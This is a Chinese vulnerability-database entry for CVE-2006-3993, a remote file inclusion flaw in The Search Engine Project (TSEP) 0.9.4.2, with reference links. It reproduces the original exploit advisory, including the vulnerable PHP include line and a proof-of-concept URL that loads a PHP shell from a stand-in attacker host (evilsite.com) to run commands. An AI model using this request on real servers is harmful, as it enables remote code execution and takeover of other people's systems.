The Search Engine Project (TSEP) 'colorswitch.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110732 漏洞类型 输入验证
发布时间 2006-08-01 更新时间 2006-08-08
CVE编号 CVE-2006-3993 CNNVD-ID CNNVD-200608-060
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2098
https://cxsecurity.com/issue/WLB-2006080032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-060
|漏洞详情
TheSearchEngineProject(TSEP)是一种开源的Web站点内容搜索软件。TSEP处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。TSEP的colorswitch.php脚本没有正确验证tsep_config[absPath]参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
|漏洞EXP
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Venedor ...........: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in copyright.php
+
+--------------------------------------------------------------------
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-01]
|参考资料

来源:MISC
链接:https://svn.sourceforge.net/svnroot/tsep/tsep-svn/trunk/delivery/include/copyright.php
来源:XF
名称:tsep-copyright-file-include(28107)
链接:http://xforce.iss.net/xforce/xfdb/28107
来源:BID
名称:19268
链接:http://www.securityfocus.com/bid/19268
来源:BUGTRAQ
名称:20060801TSEP0.9.4.2<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/441828/100/0/threaded
来源:MILW0RM
名称:2098
链接:http://www.milw0rm.com/exploits/2098
来源:VUPEN
名称:ADV-2006-3095
链接:http://www.frsirt.com/english/advisories/2006/3095
来源:MISC
链接:http://www.bb-pcsecurity.de/sicherheit_269.htm
来源:SECUNIA
名称:21291
链接:http://secunia.com/advisories/21291
来源:SECTRACK
名称:1016626
链接:http://securitytracker.com/id?1016626
来源:SREASON
名称:1323
链接:http://securityreason.com/securityalert/1323
来源:MILW0RM
名称:2098
链接:http://milw0rm.com/exploits/2098